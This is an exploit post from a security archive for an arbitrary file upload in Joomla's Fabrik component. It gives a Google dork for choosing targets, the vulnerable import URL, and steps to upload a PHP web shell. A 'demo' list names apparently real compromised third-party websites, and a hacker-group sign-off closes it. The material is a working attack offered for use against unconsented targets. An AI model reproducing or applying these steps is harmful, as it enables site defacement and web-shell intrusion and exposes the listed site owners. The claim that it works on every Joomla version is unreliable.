F3D4İ's Joomla Arbitrary File Upload Vulnerability

Published
Credit
Risk
2017.01.08
F3D4İ
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:viewtable?cid= site:it

# Exploit Title : F3D4İ's Joomla Arbitrary File Upload Vulnerability
# Google Dork : inurl:viewtable?cid= site:it
# Tested On : [ Windows- Linux ]
# Date: 07.01.2017
# Exploit Author: F3D4İ
#Author Details:twitter.com/f3d4i6
#Tested on: Kali Linux 2.0 / Windows 7-8-10
#Youtube Lİnk : https://youtu.be/TFEVrNYuJBk
######################
# [+] DESCRIPTION :
######################
# 1:Search Google Dork and Choose a Target
# 2: exploit:
/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
# 3: upload shell.php or index.html
# 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
------------------------------------------------
This exploit working all joomla verison but website of kind italia.
#demo:

http://www.ghostshockey.it/media/index.html
http://www.notaiopulvirenti.it/media/index.html
http://www.alphasoft.it/media/index.html
http://deuil61.123.fr/media/index.html
http://www.filuse.it/sito/media/index.html
http://www.aquoschemical.it/sito/media/index.html
http://www.decanatoappianogentile.it/grest/media/index.html
http://www.multimediaform.it/media/index.html

#Br0thers: By B0zoklu - Tmk - Kara Murat -Trajedi - DArkSide - DarkDemon - E.C - M4ni4c - M4DD3
#We are Turkish Hackers

References:

https://youtu.be/TFEVrNYuJBk


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com